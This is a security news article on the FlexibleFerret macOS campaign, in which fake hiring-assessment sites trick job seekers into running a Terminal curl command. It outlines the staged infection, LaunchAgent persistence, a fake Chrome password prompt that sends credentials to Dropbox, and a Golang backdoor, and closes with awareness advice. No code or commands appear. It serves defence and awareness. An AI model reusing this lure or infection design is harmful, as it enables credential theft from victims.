Cybercriminals are employing a sophisticated social engineering scheme, dubbed FlexibleFerret, that exploits Apple users by tricking them into running malicious commands on their Macs. This evolving threat, attributed to North Korean operators, continues the tactics seen in the Contagious Interview campaign active throughout 2025. The malware primarily spreads through deceptive job recruitment websites, promising employment but ultimately delivering credential-stealing backdoors and unauthorized system access.
FlexibleFerret Targets Apple Users with Deceptive Recruitment Schemes
The FlexibleFerret attack begins by luring job seekers to realistic-looking hiring assessment websites, such as evaluza.com and proficiencycert.com. Victims are led to believe they are participating in legitimate job assessments, often branded with plausible titles like “Blockchain Capital Operations Manager Hiring Assessment.” During these fraudulent evaluations, individuals are prompted to provide personal details and even record video introductions. The critical juncture of the attack occurs when applicants are instructed to run a specific Terminal command, purportedly to resolve camera or microphone access issues.
Jamf security analysts identified this new malware variant after observing in-the-wild detections linked to a script named macpatch.sh. Researchers discovered JavaScript files embedded within these fraudulent recruitment sites. When executed, these files are designed to construct and run curl commands. These commands then download malicious payloads directly onto the victim’s computer without their full understanding of the consequences.
Infection Mechanism and Payload Delivery
The infection mechanism for FlexibleFerret utilizes a multi-stage delivery process designed to remain hidden from the user. Once the initial curl command is executed, it downloads a shell script. This script intelligently determines the architecture of the victim’s Mac, whether it uses ARM64 or Intel processors, and then fetches the appropriate stage-two payload. The script establishes working directories within temporary locations. Persistence is achieved through the creation of LaunchAgents, which automatically launch the malware upon system login.
Simultaneously, the attackers deploy a convincing fake Chrome application. This decoy application mimics a legitimate password prompt, aiming to capture any credentials users enter. The captured information is then exfiltrated to a Dropbox account under the attackers’ control. This credential harvesting is a primary objective of the FlexibleFerret campaign, enabling further compromise.
Payload Execution and Command-and-Control
The third stage of the infection is activated by a bundled Golang backdoor. This backdoor establishes a communication channel with a command-and-control (C2) server operated by the threat actors. This sophisticated component grants attackers extensive capabilities, including the collection of system information, the ability to upload and download files, arbitrary command execution on the compromised system, theft of Chrome browser profiles, and automated credential harvesting.
To ensure its continued operation, the backdoor implements persistence mechanisms via LaunchAgent entries. It also includes robust error-handling features designed to reset the malware if temporary failures occur during its operation. This resilience ensures that if one component of the attack fails, the malware can attempt to recover and re-establish its presence.
Mitigation and User Awareness
Organizations are advised to educate their employees about the risks associated with unsolicited job assessment requests, particularly those that involve executing commands in the Terminal. Any recruitment communication that asks users to run system commands should be treated as a significant red flag and reported immediately to internal security teams. Vigilance and a healthy skepticism towards unusual requests are crucial in preventing successful social engineering attacks like FlexibleFerret. By understanding the tactics used by these cybercriminals, Apple users can better protect themselves from these evolving threats.